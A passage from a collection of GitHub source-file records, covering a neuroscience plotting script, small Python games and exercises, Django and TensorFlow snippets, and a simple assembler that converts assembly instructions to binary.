area_n * 100\n selective_n['Any'] = len(set.union(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n\n key = selection_list[0] if selection_mode == 'Single' else selection_mode\n\n return round(selective_n[key] * area_n / 100), area_n\n\n\n# from statsmodels.stats.multitest import multipletests\n# from scipy.stats import binom_test\n# counts1 = [selectivity_counts(['Gonzo', 'Oscar'], 'PresentedStimulus', 'ConcatFactor', area, [stage])\n# for area, stage in product(['PFC', 'Stri', 'IT'], ['PreDist', 'Gating', 'PostDist', 'Target'])]\n# counts2 = [selectivity_counts(['Gonzo', 'Oscar'], 'GatedStimulus', 'ConcatFactor', area, [stage])\n# for area, stage in product(['PFC', 'Stri', 'IT'], ['Cue', 'PreDist', 'PostDist'])]\n# tests = [binom_test(*count, .05, alternative='greater') for count in counts1 + counts2]\n# multipletests(tests, method='fdr_bh')\n\n\n\ndef selectivity_count_intersectional_plot(subject_list, version_aov, version_fr, selection_list, area_list, toi):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n # toi = None\n\n # version parameters\n v_aov_params = 
anova_version_aov_params(version_aov, version_fr)\n x_factors = v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n # plotting parameters\n\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n def cluster_within_timerange(cluster_list, timerange):\n if timerange is None or (type(cluster_list) is not list and np.isnan(cluster_list)):\n return bool(cluster_list)\n else:\n return any([timerange[0] <= el <= timerange[1] for el in list(chain(*cluster_list))])\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if cluster_within_timerange(unit[x_cluster_label]['clusters'], toi)]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n ax = {}\n for area in area_list:\n\n selective_n = {}\n selective_inds = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_inds[selection] = set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n selective_n[selection] = len(selective_inds[selection])\n\n ax[area] = intersectional_pie([units_per_area_inds[area], selective_inds['PreDist'], selective_inds['Gating'], selective_inds['PostDist']],\n legend_show=True if area == 'PFC' else False, title_str=area)\n\n # OR INSTEAD\n # fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n # title = ['Early (250-750ms)', 'Late (750-950ms)']\n # for toi, ax_i, title_i in zip([(100, 600), (600, 800)], ax, title):\n # [...]\n # for ii in range(5):\n # venn3([selective_inds['Gating'], selective_inds['PostDist'], selective_inds['PreDist']],\n # set_labels=['Gating', 'PostDist', 'PreDist'],\n # set_colors=['#3c3a7a', '#e08e4f', '#dbb356'], ax=ax_i)\n # ax_i.set_title(title_i)\n # fig.suptitle('Selectivity to Sensory Information on different time splits')\n\n return ax\n\n\ndef intersectional_pie(set_list, title_str='', legend_show=False, R=1):\n\n pi = math.pi\n # 0:abc, 1:ab, 2:ac, 3:bc, 4:a, 5:b, 6:c, 7:null\n color_list = ['#404040', '#5a914a', '#9c7038', '#754085', '#dbb356', '#3c3a7a', '#e08e4f', '#efefef']\n label_list = ['All', 'PreDist-Gating', 'PreDist-PostDist', 'Gating-PostDist', 'PreDist', 'Gating', 'PostDist', 'None']\n color_xy = itemgetter(4, 2, 6, 
3, 5, 1)(color_list)\n\n omega, alpha, beta, gamma = set_list\n s_abc = set.intersection(alpha, beta).intersection(gamma)\n s_ab = set.intersection(alpha, beta).difference(s_abc)\n s_ac = set.intersection(alpha, gamma).difference(s_abc)\n s_bc = set.intersection(beta, gamma).difference(s_abc)\n s_a = alpha.difference(beta).difference(gamma)\n s_b = beta.difference(alpha).difference(gamma)\n s_c = gamma.difference(alpha).difference(beta)\n s_null = omega.difference(alpha).difference(beta).difference(gamma)\n\n a_omega = len(omega)\n a_abc = len(s_abc) * 5 / a_omega\n a_ab = len(s_ab) * 5 / a_omega\n a_ac = len(s_ac) * 5 / a_omega\n a_bc = len(s_bc) * 5 / a_omega\n a_a = len(s_a) * 5 / a_omega\n a_b = len(s_b) * 5 / a_omega\n a_c = len(s_c) * 5 / a_omega\n a_null = len(s_null) * 5 / a_omega\n\n a_xy = a_a + a_b + a_c + a_ab + a_ac + a_bc\n a_omega = len(omega)\n\n r_abc = (a_abc / pi) ** (1/2)\n r_xy = ((a_abc + a_xy) / pi) ** (1/2) - r_abc\n r_null = ((a_abc + a_xy + a_null) / pi) ** (1/2) - r_abc - r_xy\n R = r_abc + r_xy + r_null\n\n fig, ax = plt.subplots()\n ax.pie([1], radius=r_abc, colors=[color_list[0]], wedgeprops=dict(width=r_abc, edgecolor=(1, 1, 1, 0), linewidth=.33))\n pie_wedge_collection = ax.pie([a_a, a_ac, a_c, a_bc, a_b, a_ab], normalize=True, radius=r_xy + r_abc, colors=list(color_xy),\n wedgeprops=dict(width=r_xy, edgecolor=(1, 1, 1, 0), linewidth=.33))\n ax.pie([1], radius=R, colors=[color_list[-1]], wedgeprops=dict(width=r_null, edgecolor=(1, 1, 1, 0), linewidth=.33))\n\n\n ax.set(aspect='equal')\n legend_elements = [Line2D([0], [0], marker='o', color=(1, 1, 1, 0), label=l, markerfacecolor=c, markeredgecolor=(1, 1, 1, 0), markersize=12)\n for c, l in zip(color_list, label_list)]\n if legend_show:\n ax.legend(handles=legend_elements, loc='upper right', bbox_to_anchor=(1.35, 0.9), frameon=False, prop={'size': 9})\n plt.show()\n ax.set_title(title_str)\n\n return ax\n\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"figures/code/plot_selective_counts.py","file_name":"plot_selective_counts.py","file_ext":"py","file_size_in_byte":15864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32262239745","text":"from sqlalchemy import (\n Column,\n Integer,\n Text,\n String,\n)\n\nimport sqlahelper\nDBSession = sqlahelper.get_session()\nBase = sqlahelper.get_base()\n\n#~ class User(Base):\n #~ __tablename__ = 'users'\n #~ __table_args__ = {'schema': 'user_administration', 'autoload': True}\n #~ id = Column(Integer, primary_key=True)\n\n","repo_name":"kalbermattenm/sitn_portal","sub_path":"sitn_portal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3961446545","text":"from random import choice\r\n\r\n# the different topics u can choose from\r\nName = [\"SAM\", \"JOHN\", \"HARRY\"]\r\nGender = [\"BOY\", \"GIRL\", \"MALE\", \"FEMALE\"]\r\nColor = [\"RED\", \"BLUE\", \"GREEN\", \"YELLOW\"]\r\nSizes = [\"SMALL\", \"MEDIUM\", \"LARGE\"]\r\nClothes = [\"PANTS\", \"SHIRTS\", \"SOCKS\"]\r\nCurrency = [\"YEN\", \"RUPIAH\", \"DOLLAR\", \"DONG\", \"POUND\"]\r\n\r\n# allocating the topic so we can choose a topic\r\nAll_Topics = [\"Name\", \"Gender\", \"Color\", \"Sizes\", \"Clothes\", \"Currency\"]\r\nAll_Topics_Dict = {\r\n \"Names\":Name,\"Gender\":Gender,\"Color\":Color,\"Sizes\":Sizes,\"Clothes\":Clothes,\"Currency\":Currency,\r\n}\r\n\r\n# all of the possible actions\r\ndef 
Correct_Guess(P1):\r\n    index = 0\r\n    GC = 0\r\n    for i in Word:\r\n        if P1!=i:\r\n            index +=1\r\n        else:\r\n            Display[index]=i\r\n            index +=1\r\n    \r\n    index = 0\r\n    for Each_Letter in Display:\r\n        if Each_Letter == Word[index]:\r\n            GC += 1\r\n            index += 1\r\n        else:\r\n            index +=1\r\n    Unused_Letters.remove(P1)\r\n    return GC\r\n\r\ndef Already_Guess():\r\n    print(\"Letter already guessed\")\r\n\r\ndef Invalid_Guess():\r\n    print(\"Please input letter\")\r\n\r\ndef incorrect_Guess(P1,LL):\r\n    for i in Unused_Letters:\r\n        if P1 == i:\r\n            Unused_Letters.remove(i)\r\n    \r\n    LL -= 1\r\n    print(\"Wrong guess u dumbo\")\r\n    return LL\r\n\r\nwhile True:\r\n    # choose topics\r\n    Topic = choice(All_Topics)\r\n    for Each_Key in All_Topics_Dict.keys():\r\n        if Topic == Each_Key:\r\n            print(\"Topic:\",Topic)\r\n            Topic = All_Topics_Dict[Each_Key]\r\n    Word = choice(Topic)\r\n    #print(Word)\r\n    print(\"Word is \" +str(len(Word))+\" letters long.\")\r\n    \r\n    Display = []\r\n    for i in Word:\r\n        Display.append(\"_\")\r\n    print(Display)\r\n    \r\n    Lives_Left = 10\r\n    Guessed_Currently = 0\r\n    Unused_Letters = []\r\n    Valid_Letters = []\r\n    for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\r\n        Unused_Letters.append(i)\r\n        Valid_Letters.append(i)\r\n    \r\n    while Lives_Left != 0 and Guessed_Currently != len(Word):\r\n        P1 = input(\"Guess here\")\r\n        P1 = P1.upper()\r\n        if P1 in Word and P1 in Unused_Letters:\r\n            Guessed_Currently = Correct_Guess(P1)\r\n        \r\n        elif P1 not in Valid_Letters:\r\n            Invalid_Guess()\r\n        \r\n        elif P1 in Valid_Letters and P1 not in Unused_Letters:\r\n            Already_Guess()\r\n        \r\n        elif P1 in Unused_Letters and P1 not in Word:\r\n            Lives_Left = incorrect_Guess(P1,Lives_Left)\r\n        \r\n        print()\r\n        print(Lives_Left,\"Lives Left\")\r\n        print(Guessed_Currently, \"/\", len(Word), \"Letters Guessed\")\r\n        print(Display)\r\n    \r\n    print()\r\n    if Lives_Left == 0:\r\n        print(\"word was\", Word, \".\")\r\n        print(\"better luck next time bozo\")\r\n    \r\n    else:\r\n        print(\"You got it nice job\")\r\n\r\n    Replay = input(\"Press the Enter key to play again, Press N to exit\")\r\n    if Replay == \"n\" or Replay == \"N\":\r\n        break\r\n    \r\n","repo_name":"frederiksjr/Programmering-portfolie","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"17231845915","text":"from ccprojects.models import ProjectChange,QuestionGroup,AnswerGroup\nfrom django.db.models.aggregates import Max\nfrom ccutilities.arangodb_utils import hierarchy\nfrom datetime import datetime,timedelta\n#from dateutil.relativedelta import relativedelta\nimport pandas as pd\nimport numpy as np\nfrom pandasql import sqldf\nfrom ccutilities.utilities import residenttenant\nfrom django.db import connection\nfrom ccreporting.models import ScoringDSet\nfrom django.db.models import Max\nfrom django.db.models.functions import Length\n\n\ndef score(impact_type,ampp):\n    if impact_type=='Training':\n        if ampp >= 1 and ampp <= 20:\n            score = ampp*0.01\n        elif ampp >= 20 and ampp <= 122:\n            score = ampp*0.05\n        elif ampp >= 123 and ampp <= 226:\n            score = ampp*0.075\n        else:\n            score = 30\n    elif impact_type=='Communication':\n        if ampp >= 1 and ampp <= 12:\n            score = ampp*0.01\n        elif ampp >= 13 and ampp <= 113:\n            score = ampp*0.05\n        elif ampp >= 114 and ampp <= 215:\n            score = ampp*0.075\n        else:\n            score = 30\n    elif impact_type=='Experiment':\n        if ampp >= 1 and ampp <= 8:\n            score = ampp*0.01\n        elif ampp >= 9 and ampp <= 101:\n            score = ampp*0.05\n        elif ampp >= 102 and ampp <= 
206:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Specialist':\n if ampp >= 1 and ampp <= 2:\n score = ampp*0.01\n elif ampp >= 3 and ampp <= 91:\n score = ampp*0.05\n elif ampp >= 92 and ampp <= 199:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Customer':\n if ampp >= 1 and ampp <= 84:\n score = ampp*0.05\n elif ampp >= 85 and ampp <= 192:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Implement':\n if ampp >= 1 and ampp <= 75:\n score = ampp*0.05\n elif ampp >= 76 and ampp <= 184:\n score = ampp*0.075\n else:\n score = 30\n else:\n score = 0\n return score\n\n","repo_name":"zafroth-devel/Caracus","sub_path":"cccalculate/scoring_analysis.py","file_name":"scoring_analysis.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72119667753","text":"###########################\n# Reset working directory #\n###########################\nimport os\nos.chdir(\"/home/btrabucco/research/multiattend\")\n###########################\n# MultiAttend Package.... #\n###########################\nfrom multiattend.model.tf_model_args import TFModelArgs\nfrom multiattend.model.tf_model_utils import TFModelUtils\nimport numpy as np\n\nclass TFModel(object):\n\n def __init__(\n self):\n self.tf_model_args = TFModelArgs()\n self.tf_model_utils = TFModelUtils()\n self.graph_is_built = False\n \n def initialize(\n self,\n load_dataset_fn):\n args = self.tf_model_args()\n self.tf_model_utils.set_args(args)\n if not self.graph_is_built:\n self.inputs_batch, self.labels_batch = self.tf_model_utils.load_dataset_fn(\n load_dataset_fn)\n self.tf_model_utils.build_parameters()\n self.tensor_encoded = self.tf_model_utils.encode(\n self.inputs_batch)\n self.tensor_logits, self.tensor_probs = self.tf_model_utils.decode(\n self.tensor_encoded)\n self.loss = self.tf_model_utils.loss_function(\n self.tensor_logits, \n self.labels_batch)\n self.gradient = self.tf_model_utils.gradient(\n self.loss)\n self.tf_model_utils.finalize_graph()\n self.graph_is_built = True\n self.tf_model_utils.run_initialize()\n \n def train(\n self,\n num_iterations):\n (_grad, \n actual_loss, \n actual_step,\n actual_inputs,\n actual_probs, \n actual_labels) = self.tf_model_utils.run_operation([\n self.gradient, \n self.loss,\n self.tf_model_utils.global_step,\n self.inputs_batch, \n self.tensor_probs, \n self.labels_batch], iterations=num_iterations)\n actual_inputs = np.argmax(actual_inputs, axis=-1)\n actual_probs = np.argmax(actual_probs, axis=-1)\n actual_labels = np.argmax(actual_labels, axis=-1)\n \n correct_predictions = 0\n total_predictions = 0\n for a, b in zip(\n actual_probs.flatten().tolist(), \n actual_labels.flatten().tolist()):\n total_predictions += 1\n if a == b:\n correct_predictions += 1\n actual_accuracy = correct_predictions / total_predictions\n \n np.set_printoptions(precision=1)\n \n print(\n \"Iteration: %d\" % actual_step,\n \"Loss: %.2f\" % actual_loss, \n \"Accuracy: %.2f\" % actual_accuracy,\n \"Input: %s\" % str(actual_inputs[0, :]),\n \"Prediction: %s\" % str(actual_probs[0, :]),\n \"Label: %s\" % str(actual_labels[0, :]))\n return {\n \"loss\": actual_loss, \n \"accuracy\": actual_accuracy, \n \"inputs\": actual_inputs, \n \"probs\": actual_probs,\n \"labels\": actual_labels}\n \n def test(\n self):\n (actual_inputs,\n actual_probs, \n actual_labels) = self.tf_model_utils.run_operation([\n self.inputs_batch, \n self.tensor_probs, \n self.labels_batch], 
iterations=1)\n actual_inputs = np.argmax(actual_inputs, axis=-1)\n actual_probs = np.argmax(actual_probs, axis=-1)\n actual_labels = np.argmax(actual_labels, axis=-1)\n \n correct_predictions = 0\n total_predictions = 0\n for a, b in zip(\n actual_probs.flatten().tolist(), \n actual_labels.flatten().tolist()):\n total_predictions += 1\n if a == b:\n correct_predictions += 1\n actual_accuracy = correct_predictions / total_predictions\n return {\n \"accuracy\": actual_accuracy, \n \"inputs\": actual_inputs, \n \"probs\": actual_probs,\n \"labels\": actual_labels}\n \n def save(\n self):\n self.tf_model_utils.run_checkpoint()","repo_name":"brandontrabucco/multiattend","sub_path":"multiattend/model/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7696632503","text":"import random\n\n\ndef is_valid_right(r):\n if r.isdigit() and int(r) > 0:\n return True\n return False\n\n\ndef is_valid(s):\n if s.isdigit() and 1 <= int(s) <= int(right_n):\n return True\n return False\n\n\ndef right_num():\n print('Укажите правую границу числа:')\n global right_n\n while True:\n right_n = input()\n if is_valid_right(right_n):\n return int(right_n)\n else:\n print('Укажите положительное число от 1:')\n\n\ndef input_num():\n print('Введите число от 1 до ', right_n, ':', sep='')\n while True:\n predict_num = input()\n if is_valid(predict_num):\n return int(predict_num)\n else:\n print('А может быть все-таки введем целое число от 1 до ', right_n, '?', sep='')\n\n\ndef game(new_game=True):\n if new_game:\n print('Добро пожаловать в числовую угадайку')\n num = random.randint(1, right_num())\n try_predict = 0\n flag = False\n final_result = 0\n\n while True:\n if flag:\n break\n\n pr = input_num()\n try_predict += 1\n\n while pr > 0:\n if pr > num:\n print('Слишком много, попробуйте еще раз')\n pr = input_num()\n try_predict += 1\n continue\n\n elif pr < num:\n print('Слишком мало, попробуйте еще раз')\n pr = input_num()\n try_predict += 1\n continue\n\n else:\n if final_result == 0:\n print('Вы угадали, поздравляем!')\n print('Количество попыток:', try_predict)\n final_result += 1\n again = input('Вы хотите сыграть еще? (Напишите \"y\" - да или \"n\" - нет): ')\n if again == 'y':\n game(new_game=False)\n elif again == 'n':\n print('Спасибо, что играли в числовую угадайку. Еще увидимся...')\n flag = True\n break\n else:\n print('Введите \"y\" - да или \"n\" - нет')\n\n\ngame()\n","repo_name":"EvgeniiyaR/game_guess_number","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15190335066","text":"lista = []\njogador = {}\ngols = []\nwhile True:\n print('-'*30)\n jogador['nome'] = str(input('Nome do Jogador: '))\n n = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n for c in range(0, n):\n gols.append(int(input(f'Quantos gols na partida {c+1}? ')))\n jogador['gols'] = gols[:]\n jogador['total'] = sum(gols)\n lista.append(jogador.copy())\n gols.clear()\n while True:\n resp = str(input('Deseja continuar? [S/N] ')).strip().upper()[0]\n if resp in 'SN':\n break\n print('ERRO! 
Responda apenas S ou N.')\n if resp == 'N':\n break\nprint('-'*40)\nprint(f'{\"Cod\":<3} {\"Nome\":<15}{\"Gols\":<15}{\"Total\":<15}')\nprint('-'*40)\nfor c, valor in enumerate(lista):\n print(f'{c:>3} {valor[\"nome\"]:<15}{str(valor[\"gols\"]):<15}{valor[\"total\"]:<15}')\nprint('-'*40)\n\nwhile True:\n resp = int(input('Mostrar dados de qual jogador? (999 para sair) '))\n if 0 <= resp <= (len(lista)-1) or resp == 999:\n if resp == 999:\n break\n print(f'-- LEVANTAMENTO DO JOGADOR {lista[resp][\"nome\"]}:')\n for c, valor in enumerate(lista[resp][\"gols\"]):\n print(f' No jogo {c+1} fez {valor} gols.')\n else:\n print(f'ERRO! Não existe jogador com código {resp}! Tente novamente.')\n print('-' * 35)\nprint('<< VOLTE SEMPRE >>')\n","repo_name":"VitorFRodrigues/Python-curso","sub_path":"PythonExercicios/ex095.py","file_name":"ex095.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31655271016","text":"from datetime import datetime\nfrom recipe import Recipe\n\nclass Book:\n def __init__(self, name):\n self.name = name\n self.creation_date = datetime.now()\n self.last_update = datetime.now()\n self.recipes_list = {\"entrante\": [], \"comida\": [], \"postre\": []}\n\n def get_recipe_by_name(self, name):\n \"\"\"Imprime la receta con el nombre name y devuelve la instancia\"\"\"\n for recipe_type in self.recipes_list:\n for recipe in self.recipes_list[recipe_type]:\n if recipe.name == name:\n print(recipe)\n return recipe\n print(f\"No se encontró ninguna receta con el nombre {name}\")\n return None\n\n def get_recipes_by_types(self, recipe_type):\n \"\"\"Devuelve todas las recetas dado un recipe_type\"\"\"\n if recipe_type not in self.recipes_list:\n print(f\"No se encontró ningún tipo de receta con el nombre {recipe_type}\")\n return []\n recipes = self.recipes_list[recipe_type]\n for recipe in recipes:\n print(recipe)\n return recipes\n\n def add_recipe(self, recipe):\n \"\"\"Añade una receta al libro y actualiza last_update\"\"\"\n if not isinstance(recipe, Recipe):\n raise ValueError(\"Debe añadir una instancia de la clase Recipe\")\n self.recipes_list[recipe.recipe_type].append(recipe)\n self.last_update = datetime.now()\n print(\"Updated at: \", self.last_update)\n\n","repo_name":"andonimarz/Python-42AI","sub_path":"module_01/ex00/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70528232554","text":"from django.conf.urls import url\n\nfrom .views import (\n ContactFormView,\n ForumView,\n TopView,\n)\n\nurlpatterns = [\n url(r'^$',\n TopView.as_view(),\n name='top'\n ),\n url(r'^contact$',\n ContactFormView.as_view(),\n name='contact'\n ),\n url(r'^forum$',\n ForumView.as_view(),\n name='forum'\n ),\n]\n","repo_name":"garigari-kun/itsuiku","sub_path":"src/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38826329504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 19 10:22:36 2020\r\n\r\n@author: Kareem Omar\r\n\"\"\"\r\nimport os\r\nimport numpy as np\r\nimport sys\r\ndef fix_length_16(assembledline: str) -> str: #append zeros on right of string to fill 16\r\n diff = 16 - len(assembledline)\r\n if(diff == 0):\r\n return assembledline\r\n fixed = ''\r\n for i in range (diff):\r\n fixed += '0'\r\n 
fixed= assembledline + fixed\r\n return fixed\r\n\r\ndef left_fix_length_20(assembledline: str) -> str: #append zeros on left of string to fill 16\r\n # assembledline.replace(\"0b\", \"\", 1)\r\n diff = 20 - len(assembledline)\r\n if(diff == 0):\r\n return assembledline\r\n fixed = ''\r\n for i in range (diff):\r\n fixed += '0'\r\n fixed+= assembledline\r\n return fixed\r\n\r\nOP_Codes = {'NOT':'000001',\r\n 'INC':'000010',\r\n 'DEC':'000011',\r\n 'OUT':'000100',\r\n 'IN':'000101',\r\n 'SWAP':'000110',\r\n 'ADD':'000111',\r\n 'SUB':'001000',\r\n 'AND':'001001',\r\n 'OR':'001010',\r\n 'PUSH':'001011',\r\n 'POP':'001100',\r\n 'JZ':'001101',\r\n 'JMP':'001110',\r\n 'CALL':'001111',\r\n 'SHL':'010000',\r\n 'SHR':'010001',\r\n 'LDM':'010010',\r\n 'IADD':'010011',\r\n 'LDD':'010100',\r\n 'STD':'010101',}\r\n\r\nRegisters = {'R0':'000',\r\n 'R1':'001',\r\n 'R2':'010',\r\n 'R3':'011',\r\n 'R4':'100',\r\n 'R5':'101',\r\n 'R6':'110',\r\n 'R7':'111',}\r\n\r\nOutputAssembledLines = {}\r\nif (len(sys.argv)>1):\r\n readfile=(sys.argv[1])\r\nelse:\r\n readfile=\"Test.asm\"\r\n\r\n\r\nsplitfilename,extension = readfile.split('.')\r\nif (len(sys.argv)>2):\r\n outfile=(sys.argv[2])\r\nelse:\r\n outfile = \"Out\" + splitfilename + \".txt\"\r\n\r\n\r\nif os.path.isfile(readfile):\r\n try:\r\n os.remove(outfile)\r\n except:\r\n print(\"Error while deleting file \", outfile)\r\nelse:\r\n print(\"file not found or no file specified\")\r\n sys.exit()\r\n\r\ncount=0 \r\nfor line in list(open(readfile)): \r\n line=line.strip()\r\n # inline comments handling start\r\n try:\r\n if(line[0] != '#'):\r\n line,comment = line.split(\"#\")\r\n #print(\"found inline comment: \" + comment)\r\n line=line.strip()\r\n except:\r\n None\r\n #inline comments handling end\r\n try:\r\n line=int(line,16)\r\n line ='{0:032b}'.format(np.uint32(line))\r\n OutputAssembledLines[count] = line[16:]\r\n count +=1\r\n OutputAssembledLines[count] = line[:16]\r\n count +=1\r\n continue\r\n except :\r\n if (not line) or (line in ['\\n', '\\r\\n']) or line.upper()[0] == '#': # empty spaces, empty lines and comments check\r\n continue\r\n elif line.upper()[0] == '.':\r\n ORGcommand,addressVal = line.split(\" \")\r\n count=int(addressVal,16)\r\n continue\r\n \r\n elif line.upper() == \"NOP\" or line.upper() == \"RET\":\r\n if line.upper() == \"NOP\":\r\n OutputAssembledLines[count] = \"0000000000000000\"\r\n else:\r\n OutputAssembledLines[count] = \"1000000000000000\"\r\n count +=1\r\n continue\r\n try:\r\n instruction_name,operands = line.split(\" \",1)\r\n instruction_name = instruction_name.strip()\r\n operands=operands.strip()\r\n instruction_name = instruction_name.upper()\r\n except:\r\n if line.strip().isdigit():\r\n continue\r\n print(\"invalid line: \" + line)\r\n continue\r\n if (instruction_name == \"NOT\" or instruction_name == \"INC\" or instruction_name == \"DEC\"):\r\n tempStr = OP_Codes[instruction_name]+Registers[operands]+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"IN\" or instruction_name == \"POP\" ):\r\n tempStr = OP_Codes[instruction_name]+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"OUT\" or instruction_name == \"PUSH\" or instruction_name == \"JZ\" or instruction_name == \"JMP\" or instruction_name == \"CALL\"):\r\n tempStr = OP_Codes[instruction_name]+\"000\"+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count 
+=1\r\n continue\r\n elif (instruction_name == \"SWAP\"):\r\n Rsrc,Rdst = operands.split(',')\r\n Rsrc = Rsrc.strip()\r\n Rdst = Rdst.strip()\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rdst]+Registers[Rsrc]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"AND\" or instruction_name == \"ADD\" or instruction_name == \"SUB\" or instruction_name == \"OR\"):\r\n Rsrc1,Rsrc2,Rdst = operands.split(',',2)\r\n Rsrc1=Rsrc1.strip()\r\n Rsrc2=Rsrc2.strip()\r\n Rdst=Rdst.strip()\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rsrc1]+Registers[Rsrc2]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"LDD\"):\r\n Rdst,EA = operands.split(',')\r\n Rdst=Rdst.strip()\r\n EA = EA.strip()\r\n EA = bin(int(EA,16))[2:]\r\n EA = left_fix_length_20(EA)\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst] +'000'+ EA[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = EA[4:]\r\n count +=1\r\n continue\r\n elif (instruction_name == \"STD\"):\r\n Rsrc,EA = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n EA = EA.strip()\r\n EA = bin(int(EA,16))[2:]\r\n EA = left_fix_length_20(EA)\r\n tempStr = OP_Codes[instruction_name]+'000'+Registers[Rsrc] + EA[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = EA[4:]\r\n count +=1\r\n continue\r\n elif (instruction_name == \"SHL\" or instruction_name == \"SHR\"):\r\n Rsrc,Imm = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rsrc]+Registers[Rsrc]+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\n elif (instruction_name == \"LDM\"):\r\n Rsrc,Imm = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rsrc]+'000'+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\n elif (instruction_name == \"IADD\"):\r\n Rsrc,Rdst,Imm = operands.split(',',2)\r\n Rsrc=Rsrc.strip()\r\n Rdst=Rdst.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rsrc]+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\ntry:\r\n out = open(outfile, \"w\")\r\n maxval= max(OutputAssembledLines,key=int)+1 # to include final value\r\n for i in range(maxval):\r\n if i in OutputAssembledLines.keys():\r\n 